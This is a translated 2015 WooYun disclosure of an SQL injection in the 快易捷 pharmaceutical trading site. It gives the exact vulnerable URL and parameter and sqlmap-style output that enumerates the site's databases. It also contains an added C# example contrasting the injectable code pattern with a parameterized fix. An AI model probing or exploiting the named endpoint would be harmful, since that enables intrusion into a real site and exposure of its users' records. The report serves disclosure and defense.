
Vulnerability Summary

Defect ID: wooyun-2015-0145813

Title: 快易捷 SQL injection vulnerability (involving 250,000 users' records)

Vendor: 快易捷

Author: 偶然

Submitted: 2015-10-10 16:40

Fixed: 2015-11-24 16:42

Published: 2015-11-24 16:42

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-10-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-24: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

As the most professional and largest pharmaceutical trading website in China, it has a huge base of medical-industry users: 200,000 registered members including pharmaceutical manufacturers, pharmaceutical companies, hospitals, clinics and pharmacies, benefiting nearly 30 million households. Its online business covers every province in the country, it has published 40 million pieces of pharmaceutical information and serves nearly 100 million people, giving it a unique position in Chinese pharmaceutical e-commerce.

Detailed description:

http://www.yp900.com/Admin_Buy/getAdInfo.ashx?areaid=8&classid=23&random= The classid parameter is injectable.
[16:01:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[16:01:31] [INFO] fetching database names
available databases [7]:
[*] db_hzt
[*] db_lady
[*] db_tuiguang
[*] master
[*] model
[*] msdb
[*] tempdb
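The report shows that the classid query-string value of an ASP.NET (.ashx) handler reaches SQL Server unsanitized. The following is an added example, not code from the original report or from the vendor's site: a hypothetical reconstruction of such a handler, with the injectable concatenation pattern shown in a comment beside a fixed version that validates the type at the boundary and binds parameters. The handler class name, connection-string name, and column names are assumptions; the table name hzt_ad_info is taken from the enumerated table list in the report.

```csharp
// Added example (not the vendor's code). Assumed handler for
// /Admin_Buy/getAdInfo.ashx?areaid=...&classid=...
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public class GetAdInfoHandler : IHttpHandler
{
    // Assumed connection-string name; not from the report.
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["db_hzt"].ConnectionString;

    public bool IsReusable { get { return false; } }

    public void ProcessRequest(HttpContext ctx)
    {
        string areaId = ctx.Request.QueryString["areaid"];
        string classId = ctx.Request.QueryString["classid"];

        // INJECTABLE PATTERN (consistent with the report): the raw query-string
        // values are spliced into the SQL text, so classid is parsed as SQL.
        //   string sql = "SELECT id, title, url FROM hzt_ad_info WHERE areaid="
        //                + areaId + " AND classid=" + classId;

        // FIXED: reject anything that is not an integer, then bind parameters
        // so the values are sent as typed data, never as SQL text.
        int areaIdNum, classIdNum;
        if (!int.TryParse(areaId, out areaIdNum) ||
            !int.TryParse(classId, out classIdNum))
        {
            ctx.Response.StatusCode = 400;  // malformed request, nothing queried
            return;
        }

        const string sql =
            "SELECT TOP 20 id, title, url FROM hzt_ad_info " +   // columns assumed
            "WHERE areaid = @areaid AND classid = @classid";

        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@areaid", SqlDbType.Int).Value = areaIdNum;
            cmd.Parameters.Add("@classid", SqlDbType.Int).Value = classIdNum;
            conn.Open();
            using (SqlDataReader rd = cmd.ExecuteReader())
            {
                ctx.Response.ContentType = "text/plain";
                while (rd.Read())
                    ctx.Response.Write(rd["id"] + "|" + rd["title"] + "|" + rd["url"] + "\n");
            }
        }
    }
}
```

The same parameter binding applies to every handler that builds SQL from request input; pairing it with a least-privilege SQL login limits what an injection elsewhere can read.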

Proof of vulnerability:

Database: db_hzt
[189 tables]

(Screenshots: 3.jpg, 1.jpg, 2.jpg)

Remediation:

Copyright notice: when reposting, please credit the source: 偶然@乌云


Vulnerability Response

Vendor response:

Unable to contact the vendor, or the vendor actively declined

Vulnerability Rank: 15 (WooYun rating)